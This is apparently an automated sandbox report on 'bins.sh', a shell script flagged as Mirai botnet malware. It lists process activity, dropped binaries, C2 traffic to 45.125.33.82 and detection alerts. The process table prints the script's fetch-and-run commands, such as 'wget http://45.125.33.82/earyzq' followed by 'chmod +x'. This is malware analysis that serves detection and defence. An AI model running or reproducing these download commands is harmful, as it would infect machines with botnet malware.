| File name: | bins.sh |
| Full analysis: | https://app.any.run/tasks/0632c2a8-ad4a-47b5-820a-bf8d9d601a5d |
| Verdict: | Malicious activity |
| Analysis date: | May 17, 2025, 18:16:32 |
| OS: | Ubuntu 22.04.2 |
| Indicators: | |
| MIME: | text/x-shellscript |
| File info: | Bourne-Again shell script, ASCII text executable |
| MD5: | A074AC485A1F04AF0E9A0726FC0D164A |
| SHA1: | 4B0127340CBF98827C00F3FA28F651F45C8A2DB4 |
| SHA256: | 07E264784F1DE87ED958D458251A3810DC1A6FC7437CF234FCB0C574D261CEE9 |
| SSDEEP: | 24:vaoUaLTcsa4Gav2cJaTlaSad3aCyaZ/acwaafsaP2Oa01Qayh:vUmTcs5GcJIlaSQsEwoQ2O11Qz |
MALICIOUS
Application was dropped or rewritten from another process
- vvglma (PID: 41077)
- vvglma (PID: 41075)
- vvglma (PID: 41076)
- vvglma (PID: 41078)
- qvmxvl (deleted) (PID: 41185)
- qvmxvl (deleted) (PID: 41197)
- qvmxvl (deleted) (PID: 41189)
- qvmxvl (PID: 41170)
- qvmxvl (deleted) (PID: 41191)
- qvmxvl (PID: 41168)
- qvmxvl (PID: 41167)
- qvmxvl (deleted) (PID: 41187)
- qvmxvl (PID: 41169)
- qvmxvl (deleted) (PID: 41195)
- qvmxvl (PID: 41172)
- qvmxvl (deleted) (PID: 41199)
- qvmxvl (deleted) (PID: 41193)
Removes log files
- vvglma (PID: 41078)
- dash (PID: 41090)
- razdzn (deleted) (PID: 41145)
- qvmxvl (deleted) (PID: 41185)
MIRAI has been detected (SURICATA)
- vvglma (PID: 41078)
SUSPICIOUS
Starts itself from another location
- qvmxvl (PID: 41170)
- razdzn (PID: 41130)
- vvglma (PID: 41078)
Executes commands using command-line interpreter
- sudo (PID: 41047)
- bash (PID: 41048)
Modifies file or directory owner
- sudo (PID: 41043)
Uses wget to download content
- bash (PID: 41048)
Executes the "rm" command to delete files or directories
- bash (PID: 41048)
- dash (PID: 41080)
- dash (PID: 41094)
- dash (PID: 41092)
- razdzn (deleted) (PID: 41134)
- dash (PID: 41136)
- razdzn (deleted) (PID: 41147)
- razdzn (deleted) (PID: 41145)
- qvmxvl (PID: 41172)
- qvmxvl (deleted) (PID: 41185)
- razdzn (deleted) (PID: 41149)
- qvmxvl (deleted) (PID: 41187)
- qvmxvl (deleted) (PID: 41189)
- qvmxvl (deleted) (PID: 41229)
- dash (PID: 41090)
- razdzn (deleted) (PID: 41211)
Potential Corporate Privacy Violation
- wget (PID: 41064)
- wget (PID: 41069)
- wget (PID: 41050)
- wget (PID: 41081)
- wget (PID: 41126)
- wget (PID: 41132)
- wget (PID: 41055)
- wget (PID: 41173)
- wget (PID: 41143)
- wget (PID: 41210)
- wget (PID: 41236)
- wget (PID: 41228)
Connects to the server without a host name
- wget (PID: 41055)
- wget (PID: 41064)
- wget (PID: 41050)
- wget (PID: 41069)
- wget (PID: 41081)
Connects to unusual port
- vvglma (PID: 41078)
- razdzn (deleted) (PID: 41133)
- qvmxvl (PID: 41170)
Checks DMI information (probably VM detection)
- udevadm (PID: 41099)
Gets information about currently running processes
- dash (PID: 41102)
- dash (PID: 41104)
- dash (PID: 41100)
- razdzn (deleted) (PID: 41153)
- razdzn (deleted) (PID: 41155)
- razdzn (deleted) (PID: 41157)
- qvmxvl (deleted) (PID: 41195)
- qvmxvl (deleted) (PID: 41193)
- qvmxvl (deleted) (PID: 41197)
Clears command history
- dash (PID: 41136)
- vvglma (PID: 41078)
- razdzn (deleted) (PID: 41211)
- qvmxvl (deleted) (PID: 41229)
Contacting a server suspected of hosting an CnC
- vvglma (PID: 41078)
Reads passwd file
- whoopsie (PID: 41086)
INFO
Checks timezone
- wget (PID: 41050)
- wget (PID: 41055)
- wget (PID: 41069)
- python3.10 (PID: 41087)
- whoopsie (PID: 41086)
- wget (PID: 41064)
- python3.10 (PID: 41089)
- wget (PID: 41126)
- wget (PID: 41132)
- wget (PID: 41143)
- wget (PID: 41173)
- wget (PID: 41210)
- wget (PID: 41228)
- wget (PID: 41236)
- wget (PID: 41241)
- wget (PID: 41081)
Creates file in the temporary folder
- wget (PID: 41050)
- wget (PID: 41069)
- wget (PID: 41081)
- wget (PID: 41055)
- wget (PID: 41064)
- wget (PID: 41126)
- wget (PID: 41132)
- wget (PID: 41143)
- wget (PID: 41173)
- wget (PID: 41210)
- wget (PID: 41228)
- wget (PID: 41236)
Find more information about signature artifacts and mapping to MITRE ATT&CK™ MATRIX at the full report
TRiD
| .sh | | | Linux/UNIX shell script (100) |
|---|
Total processes
320
Monitored processes
190
Malicious processes
10
Suspicious processes
7
Behavior graph
Click at the process to see the details
Process information
PID | CMD | Path | Indicators | Parent process | |||||||||||
|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|
| 41042 | /bin/sh -c "sudo chown user /home/user/Desktop/bins\.sh && chmod +x /home/user/Desktop/bins\.sh && DISPLAY=:0 sudo -iu user /home/user/Desktop/bins\.sh " | /usr/bin/dash | — | IntiFjKCklFyPMJr | |||||||||||
User: user Integrity Level: UNKNOWN Exit code: 0 Modules
| |||||||||||||||
| 41043 | sudo chown user /home/user/Desktop/bins.sh | /usr/bin/sudo | — | dash | |||||||||||
User: root Integrity Level: UNKNOWN Exit code: 0 Modules
| |||||||||||||||
| 41044 | chown user /home/user/Desktop/bins.sh | /usr/bin/chown | — | sudo | |||||||||||
User: root Integrity Level: UNKNOWN Exit code: 0 Modules
| |||||||||||||||
| 41045 | chmod +x /home/user/Desktop/bins.sh | /usr/bin/chmod | — | dash | |||||||||||
User: user Integrity Level: UNKNOWN Exit code: 0 Modules
| |||||||||||||||
| 41047 | sudo -iu user /home/user/Desktop/bins.sh | /usr/bin/sudo | — | dash | |||||||||||
User: root Integrity Level: UNKNOWN Exit code: 0 Modules
| |||||||||||||||
| 41048 | /bin/bash /home/user/Desktop/bins.sh | /usr/bin/bash | — | sudo | |||||||||||
User: user Integrity Level: UNKNOWN Exit code: 0 Modules
| |||||||||||||||
| 41049 | /usr/bin/locale-check C.UTF-8 | /usr/bin/locale-check | — | bash | |||||||||||
User: user Integrity Level: UNKNOWN Exit code: 0 Modules
| |||||||||||||||
| 41050 | wget http://45.125.33.82/earyzq | /usr/bin/wget | bash | ||||||||||||
User: user Integrity Level: UNKNOWN Exit code: 0 Modules
| |||||||||||||||
| 41051 | chmod +x earyzq | /usr/bin/chmod | — | bash | |||||||||||
User: user Integrity Level: UNKNOWN Exit code: 0 Modules
| |||||||||||||||
| 41052 | /bin/bash /home/user/Desktop/bins.sh | /usr/bin/bash | — | bash | |||||||||||
User: user Integrity Level: UNKNOWN Exit code: 32256 | |||||||||||||||
Executable files
0
Suspicious files
12
Text files
1
Unknown types
0
Dropped files
PID | Process | Filename | Type | |
|---|---|---|---|---|
| 41050 | wget | /tmp/earyzq (deleted) | binary | |
MD5:— | SHA256:— | |||
| 41055 | wget | /tmp/cemtop (deleted) | binary | |
MD5:— | SHA256:— | |||
| 41064 | wget | /tmp/vtyhat (deleted) | binary | |
MD5:— | SHA256:— | |||
| 41069 | wget | /tmp/vvglma (deleted) | binary | |
MD5:— | SHA256:— | |||
| 41086 | whoopsie | /var/lib/whoopsie/whoopsie-id | text | |
MD5:— | SHA256:— | |||
| 41081 | wget | /tmp/nvitpj (deleted) | binary | |
MD5:— | SHA256:— | |||
| 41126 | wget | /tmp/razdzn | binary | |
MD5:— | SHA256:— | |||
| 41132 | wget | /tmp/lnkfmx (deleted) | binary | |
MD5:— | SHA256:— | |||
| 41143 | wget | /tmp/qvmxvl (deleted) | binary | |
MD5:— | SHA256:— | |||
| 41173 | wget | /tmp/ajoomk (deleted) | binary | |
MD5:— | SHA256:— | |||
Download PCAP, analyze network streams, HTTP content and a lot more at the full report
HTTP(S) requests
16
TCP/UDP connections
24
DNS requests
12
Threats
13
HTTP requests
PID | Process | Method | HTTP Code | IP | URL | CN | Type | Size | Reputation |
|---|---|---|---|---|---|---|---|---|---|
— | — | GET | 204 | 185.125.190.97:80 | http://connectivity-check.ubuntu.com/ | unknown | — | — | whitelisted |
41055 | wget | GET | 200 | 45.125.33.82:80 | http://45.125.33.82/cemtop | unknown | — | — | unknown |
41050 | wget | GET | 200 | 45.125.33.82:80 | http://45.125.33.82/earyzq | unknown | — | — | unknown |
— | — | GET | — | 91.189.91.48:80 | http://connectivity-check.ubuntu.com/ | unknown | — | — | whitelisted |
— | — | GET | — | 91.189.91.48:80 | http://connectivity-check.ubuntu.com/ | unknown | — | — | whitelisted |
41081 | wget | GET | 200 | 45.125.33.82:80 | http://45.125.33.82/nvitpj | unknown | — | — | unknown |
41143 | wget | GET | 200 | 45.125.33.82:80 | http://45.125.33.82/qvmxvl | unknown | — | — | unknown |
41241 | wget | GET | 404 | 45.125.33.82:80 | http://45.125.33.82/adcvds | unknown | — | — | malicious |
41132 | wget | GET | 200 | 45.125.33.82:80 | http://45.125.33.82/lnkfmx | unknown | — | — | malicious |
41064 | wget | GET | 200 | 45.125.33.82:80 | http://45.125.33.82/vtyhat | unknown | — | — | unknown |
Download PCAP, analyze network streams, HTTP content and a lot more at the full report
Connections
PID | Process | IP | Domain | ASN | CN | Reputation |
|---|---|---|---|---|---|---|
— | — | 91.189.91.48:80 | — | Canonical Group Limited | US | unknown |
484 | avahi-daemon | 224.0.0.251:5353 | — | — | — | unknown |
— | — | 185.125.190.97:80 | — | Canonical Group Limited | GB | unknown |
— | — | 37.19.194.80:443 | odrs.gnome.org | Datacamp Limited | DE | whitelisted |
512 | snapd | 185.125.188.57:443 | api.snapcraft.io | Canonical Group Limited | GB | whitelisted |
41050 | wget | 45.125.33.82:80 | — | Cloudie Limited | HK | unknown |
41055 | wget | 45.125.33.82:80 | — | Cloudie Limited | HK | unknown |
41064 | wget | 45.125.33.82:80 | — | Cloudie Limited | HK | unknown |
41069 | wget | 45.125.33.82:80 | — | Cloudie Limited | HK | unknown |
41078 | vvglma | 45.125.33.82:23966 | — | Cloudie Limited | HK | unknown |
DNS requests
Domain | IP | Reputation |
|---|---|---|
odrs.gnome.org |
| whitelisted |
google.com |
| whitelisted |
connectivity-check.ubuntu.com |
| whitelisted |
api.snapcraft.io |
| whitelisted |
6.100.168.192.in-addr.arpa |
| unknown |
Threats
PID | Process | Class | Message |
|---|---|---|---|
41050 | wget | Potential Corporate Privacy Violation | ET INFO Executable and linking format (ELF) file download Over HTTP |
41055 | wget | Potential Corporate Privacy Violation | ET INFO Executable and linking format (ELF) file download Over HTTP |
41064 | wget | Potential Corporate Privacy Violation | ET INFO Executable and linking format (ELF) file download Over HTTP |
41069 | wget | Potential Corporate Privacy Violation | ET INFO Executable and linking format (ELF) file download Over HTTP |
41081 | wget | Potential Corporate Privacy Violation | ET INFO Executable and linking format (ELF) file download Over HTTP |
41126 | wget | Potential Corporate Privacy Violation | ET INFO Executable and linking format (ELF) file download Over HTTP |
41132 | wget | Potential Corporate Privacy Violation | ET INFO Executable and linking format (ELF) file download Over HTTP |
41143 | wget | Potential Corporate Privacy Violation | ET INFO Executable and linking format (ELF) file download Over HTTP |
41173 | wget | Potential Corporate Privacy Violation | ET INFO Executable and linking format (ELF) file download Over HTTP |
41210 | wget | Potential Corporate Privacy Violation | ET INFO Executable and linking format (ELF) file download Over HTTP |